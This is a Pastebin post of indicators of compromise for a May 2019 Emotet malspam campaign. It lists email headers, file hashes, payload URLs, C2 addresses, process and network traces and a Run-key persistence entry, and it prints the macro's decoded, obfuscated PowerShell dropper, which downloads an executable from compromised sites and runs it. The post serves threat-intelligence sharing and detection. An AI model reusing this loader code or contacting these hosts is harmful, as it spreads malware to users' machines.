SHARE
TWEET

#emotet_150519

VRad May 16th, 2019 (edited) 572 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #IOC #OptiData #VR #emotet #W97M #macro #WMI #powershell
  2.  
  3. https://pastebin.com/F520pqQW
  4.  
  5. previous_contact:
  6. 28/01/19        https://pastebin.com/z2TDfM7s
  7. 23/01/18        https://pastebin.com/D9TDts5J
  8. 20/12/18        https://pastebin.com/EejcbL4t
  9. 04/12/18        https://pastebin.com/znQDtbnt  
  10. 09/11/18        https://pastebin.com/THHMs2wg
  11. 01/10/18        https://pastebin.com/Y6DnbpHv
  12.  
  13. FAQ:
  14.  
  15. attack_vector
  16. --------------
  17. email attach .doc > macro > WMI > powershell -enc > GET 5 URL > \Users\%name%\206.exe > C:\Users\%name%\AppData\Local\?\?.exe
  18.  
  19. email_headers
  20. --------------
  21. Received: from diossa.com.mx (u21557617.onlinehome-server.com [198.251.79.161])
  22. Received: from [24.51.132.88] (unknown [24.51.132.88]) by diossa.com.mx (Postfix)
  23. Date: Wed, 15 May 2019 17:00:50 -0500
  24. From: Севернюк Татьяна <ventas_tpc@diossa.com.mx>
  25. To:  <user00@victim01>
  26. Subject: RE: RE: Ціновий запит_комплектація для санвузла
  27.  
  28. files
  29. --------------
  30. SHA-256     e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee
  31. File name   DATA-916228-2122097647.doc  [Composite Document File V2 Document, Application: Microsoft Office Word]
  32. File size   145.13 KB (148608 bytes)
  33.  
  34. SHA-256     4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2
  35. File name   l4gktj_307970247.exe        [PE32 executable (GUI) Intel 80386, for MS Windows] .!..L.!This program cannot be run in DOS mode.
  36. File size   75 KB (76800 bytes)
  37.  
  38. activity
  39. **************
  40. macro_ps_b64_decoded:
  41. -------------- 
  42. $d76278='G655408';$H8_55169 = '206';$r8274_42='X16181_';$W_4_77=$env:userprofile+'\'+$H8_55169+'.exe';$R57_3513='E8329_3';$F64254=.('n'+'ew'+'-object') nET.W`EBCl`I`e`NT;$i93085='http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/@http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/@https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/@http://adsprout[.] co/wp/oMrTbPUxE/@http://springhelp[.] co[.] za/wp/jMSZNshHRf/'.spLIt('@');$L60586_1='l3_9674';foreach($u0210836 in $i93085){try{$F64254.doWnLOAdFIle($u0210836, $W_4_77);$v34879_9='n2511836';If ((&('Get'+'-It'+'em') $W_4_77).LeNgTh -ge 20603) {.('I'+'n'+'voke-'+'Item') $W_4_77;$O5_0_23='f58719_0';break;$m882344='F3145289'}}catch{}}$j7906445='N9535207'
  43.  
  44. PL_SCR      5 / 5
  45. -------------- 
  46. http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/
  47. http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/
  48. https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/
  49. http://adsprout[.] co/wp/oMrTbPUxE/
  50. http://springhelp[.] co[.] za/wp/jMSZNshHRf/
  51.  
  52. C2
  53. --------------
  54. 78.188.7.213:8090
  55. 138.68.13.161:8080     
  56.  
  57. netwrk
  58. --------------
  59. 37.9.175.14 tomasoleksak{.} com GET /wp-includes/zm2ga7ha2l_5q8wl-2798/ HTTP/1.1                no User Agent (!)
  60. 78.188.7.213    78.188.7.213:8090   POST /health/               HTTP/1.1  (application/x-www-form-urlencoded)   Mozilla/4.0
  61. 138.68.13.161   138.68.13.161:8080  POST /loadan/enable/stubs/merge/    HTTP/1.1  (application/x-www-form-urlencoded)   Mozilla/4.0
  62.  
  63. comp
  64. --------------
  65. powershell.exe  2632    TCP localhost   49539   37.9.175.14 80  ESTABLISHED
  66. eventssmall.exe 2108    TCP localhost   49540   90.57.69.215    80  SYN_SENT                   
  67. eventssmall.exe 2108    TCP localhost   49542   191.92.69.115   80  SYN_SENT                   
  68. eventssmall.exe 2108    TCP localhost   49544   75.177.169.225  80  SYN_SENT                   
  69. eventssmall.exe 2108    TCP localhost   49546   78.188.7.213    8090    ESTABLISHED                
  70. eventssmall.exe 2108    TCP localhost   49547   207.44.45.27    22  SYN_SENT
  71. eventssmall.exe 2108    TCP localhost   49548   138.68.13.161   8080    ESTABLISHED
  72.  
  73. proc
  74. --------------
  75. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  76. ... [another context]
  77. C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  78. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc JABkADcAN...==
  79. C:\Users\operator\206.exe
  80. C:\Users\operator\206.exe --d4ba2bdd
  81. C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe
  82. C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe --21b679c3
  83.  
  84. persist
  85. --------------
  86. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run      16.05.2019 11:08   
  87. eventssmall        
  88. c:\users\operator\appdata\local\eventssmall\eventssmall.exe 03.09.2012 12:06
  89.  
  90. drop
  91. --------------
  92. %temp%\VBE\
  93. %temp%\Word8.0\MSForms.exd
  94. C:\Users\operator\206.exe   [removed]
  95. C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe
  96.  
  97. # # #
  98.  
  99. https://www.virustotal.com/gui/file/4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2/details
  100. https://www.virustotal.com/gui/file/e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee/details
  101. https://analyze.intezer.com/#/analyses/8f8911d3-7fb2-4e0d-9073-6c178d68c3ef
  102.  
  103. VR
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top